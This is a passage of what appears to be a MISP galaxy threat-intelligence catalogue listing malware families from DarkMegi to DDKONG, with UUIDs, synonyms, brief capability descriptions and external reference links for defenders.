DarkMegi
Internal MISP references
UUID 3521faaa-1136-4e50-9fe2-3f33359e8b1d
which can be used as unique global reference for DarkMegi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Darkmoon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Darkmoon.
Known Synonyms |
---|
Chymine |
Internal MISP references
UUID 81ca4876-b4a4-43e9-b8a9-8a88709dd3d2
which can be used as unique global reference for Darkmoon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon - webarchive
- http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html - webarchive
- https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml - webarchive
- http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkPink
Internal MISP references
UUID f3522624-a704-4d74-8c21-1c863ab6d5eb
which can be used as unique global reference for DarkPink
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkPulsar
Internal MISP references
UUID 1aecd6eb-80e2-4598-8504-d93f69c7a8f0
which can be used as unique global reference for DarkPulsar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkRat
Internal MISP references
UUID bcff979f-2b4b-41cc-86c9-fe1ea3adce6e
which can be used as unique global reference for DarkRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkShell
DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.
Internal MISP references
UUID 7fcb9d77-a685-4705-86f0-e62a7302e836
which can be used as unique global reference for DarkShell
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell - webarchive
- https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkSide (Windows)
FireEye describes DARKSIDE as a ransomware written in C that can be configured to target files on fixed disks, removable disks, or network shares. Affiliates can customize the malware to create a build for specific victims.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkSide (Windows).
Known Synonyms |
---|
BlackMatter |
Internal MISP references
UUID 625bcba0-faab-468e-b5ab-61116cb1b5cf
which can be used as unique global reference for DarkSide (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/ - webarchive
- https://www.secjuice.com/blue-team-detection-darkside-ransomware/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-waterfall - webarchive
- https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html - webarchive
- https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/ - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://therecord.media/popular-hacking-forum-bans-ransomware-ads/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://threatpost.com/guess-fashion-data-loss-ransomware/167754/ - webarchive
- https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/ - webarchive
- https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims - webarchive
- https://zawadidone.nl/darkside-ransomware-analysis/ - webarchive
- https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/ - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/ - webarchive
- https://www.databreaches.net/a-chat-with-darkside/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf - webarchive
- https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html - webarchive
- https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf - webarchive
- https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections - webarchive
- https://twitter.com/ValthekOn/status/1422385890467491841?s=20 - webarchive
- https://twitter.com/JAMESWT_MHT/status/1388301138437578757 - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html - webarchive
- https://community.riskiq.com/article/fdf74f23 - webarchive
- https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions - webarchive
- https://unit42.paloaltonetworks.com/darkside-ransomware/ - webarchive
- https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/ - webarchive
- https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/ - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.glimps.fr/lockbit3-0/ - webarchive
- http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/ - webarchive
- https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/ - webarchive
- https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/ - webarchive
- https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom - webarchive
- https://brandefense.io/darkside-ransomware-analysis-report/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-131a - webarchive
- https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/ - webarchive
- https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution - webarchive
- https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin - webarchive
- https://www.varonis.com/blog/darkside-ransomware/ - webarchive
- https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/ - webarchive
- https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/ - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime - webarchive
- https://www.mandiant.com/resources/burrowing-your-way-into-vpns - webarchive
- https://twitter.com/embee_research/status/1678631524374020098?s=46 - webarchive
- https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline# - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636 - webarchive
- https://twitter.com/sysopfb/status/1422280887274639375 - webarchive
- https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968 - webarchive
- http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/ - webarchive
- https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/ - webarchive
- https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/ - webarchive
- https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/ - webarchive
- https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/ - webarchive
- https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/ - webarchive
- https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html - webarchive
- https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a - webarchive
- https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack - webarchive
- https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware - webarchive
- https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html - webarchive
- https://github.com/sisoma2/malware_analysis/tree/master/blackmatter - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/ - webarchive
- https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/ - webarchive
- https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html - webarchive
- https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/ - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/ - webarchive
- https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6 - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/ - webarchive
- https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/ - webarchive
- https://www.acronis.com/en-us/articles/darkside-ransomware/ - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/ - webarchive
- https://asec.ahnlab.com/en/34549/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/ - webarchive
- https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside - webarchive
- https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/ - webarchive
- https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Darksky
DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.
Internal MISP references
UUID d5f2e3c4-adf4-4156-98b1-b207f70522bb
which can be used as unique global reference for Darksky
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkStRat
Internal MISP references
UUID b9692126-e6e9-4ab3-8494-959fd1269ff4
which can be used as unique global reference for DarkStRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkTequila
Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.
Internal MISP references
UUID 374080b4-5e6c-4992-a7f5-def1f2975494
which can be used as unique global reference for DarkTequila
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkTortilla
DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.
From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Internal MISP references
UUID fa08ee9c-d0e8-4c49-8a4d-af8e36206219
which can be used as unique global reference for DarkTortilla
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Darktrack RAT
According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access to and control over an infected device. The level of control these programs have varies; however, some can allow user-level manipulation of the affected machine.
The functionalities of RATs likewise vary, and so does the scope of potential misuse. DarkTrack has a broad range of functions and capabilities, which make this Trojan a highly dangerous piece of software.
Internal MISP references
UUID fc91803f-610c-4ad5-ba0c-b78d65abc6db
which can be used as unique global reference for Darktrack RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat - webarchive
- https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf - webarchive
- http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml - webarchive
- https://www.facebook.com/darktrackrat/ - webarchive
- https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1 - webarchive
- https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=7481257469 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkVision RAT
Internal MISP references
UUID a3fbf190-c562-4af0-8d9a-4a610b7a15e4
which can be used as unique global reference for DarkVision RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkVNC
According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. It can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates silently in the background. Therefore, it is highly likely that the victims will not notice that their systems have been compromised.
Internal MISP references
UUID 302b2b26-9833-4da7-94f5-a7bd152ad40c
which can be used as unique global reference for DarkVNC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Daserf
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Daserf.
Known Synonyms |
---|
Muirim |
Nioupale |
Internal MISP references
UUID 70f6c71f-bc0c-4889-86e3-ef04e5b8415b
which can be used as unique global reference for Daserf
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-butler - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/ - webarchive
- https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DataExfiltrator
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DataExfiltrator.
Known Synonyms |
---|
FileSender |
Internal MISP references
UUID 96d727c3-bac6-4c7e-8868-b7237df55ecd
which can be used as unique global reference for DataExfiltrator
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Datper
Internal MISP references
UUID 827490bf-19b8-4d14-83b3-7da67fbe436c
which can be used as unique global reference for Datper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.datper - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/ - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html - webarchive
- https://www.macnica.net/mpressioncss/feature_05.html/ - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/ - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Daxin
Symantec describes this as malware written as a Windows kernel driver, used by China-linked threat actors. The malware has a custom TCP/IP stack and is capable of hijacking network connections.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Daxin.
Known Synonyms |
---|
DELIMEAT |
Internal MISP references
UUID 63bf3200-5e7b-4e29-ba1c-6bf834c15459
which can be used as unique global reference for Daxin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin - webarchive
- https://twitter.com/M_haggis/status/1498399791276912640 - webarchive
- https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6 - webarchive
- https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage - webarchive
- https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/ - webarchive
- https://teamt5.org/tw/posts/backdoor-of-driver-analysis-Daxin/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis - webarchive
- https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292 - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DBatLoader
This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DBatLoader.
Known Synonyms |
---|
ModiLoader |
NatsoLoader |
Internal MISP references
UUID 17e0756b-6cc6-4c25-825c-5fd85c236218
which can be used as unique global reference for DBatLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader - webarchive
- https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/ - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm - webarchive
- https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ - webarchive
- https://blog.vincss.net/re016-malware-analysis-modiloader/ - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 - webarchive
- https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses - webarchive
- https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat - webarchive
- https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/ - webarchive
- https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands - webarchive
- https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/ - webarchive
- https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DBoxAgent
This malware uses Dropbox as its C&C channel.
Internal MISP references
UUID 407002c1-1781-4d1c-90bb-3d859f5c2943
which can be used as unique global reference for DBoxAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DcDcrypt
Ransomware written in .NET.
Internal MISP references
UUID 6192f006-e1ba-47cb-b388-af82e4435a51
which can be used as unique global reference for DcDcrypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DCRat
DCRat is a typical RAT that has been around since at least June 2019.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DCRat.
Known Synonyms |
---|
DarkCrystal RAT |
Internal MISP references
UUID b32ffb50-8ef1-4c78-a71a-bb23089b4de6
which can be used as unique global reference for DCRat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://github.com/jeFF0Falltrades/rat_king_parser - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_9_takeda_furukawa_en.pdf - webarchive
- https://community.riskiq.com/article/50c77491 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://cert.gov.ua/article/6279561 - webarchive
- https://embee-research.ghost.io/dcrat-manual-de-obfuscation/ - webarchive
- https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains - webarchive
- https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html - webarchive
- https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html - webarchive
- https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus - webarchive
- https://www.infinitumit.com.tr/dcrat-malware-analiz-raporu/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://cert.gov.ua/article/160530 - webarchive
- https://cert.gov.ua/article/405538 - webarchive
- https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/ - webarchive
- https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/ - webarchive
- https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.youtube.com/watch?v=ElqmQDySy48 - webarchive
- https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time - webarchive
- https://embeeresearch.io/dcrat-manual-de-obfuscation/ - webarchive
- https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/ - webarchive
- https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://muha2xmad.github.io/malware-analysis/dcrat/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://axmahr.github.io/posts/asyncrat-detection/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DCSrv
Ransomware used by MosesStaff, built around the DiskCryptor tool.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DCSrv.
Known Synonyms |
---|
DCrSrv |
Internal MISP references
UUID 7b2609aa-fc3f-4693-a3f1-da4cac77490c
which can be used as unique global reference for DCSrv
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DDKeylogger
Internal MISP references
UUID 78796a09-cac4-47fc-9e31-9f2ff5b8e377
which can be used as unique global reference for DDKeylogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DDKONG
Internal MISP references
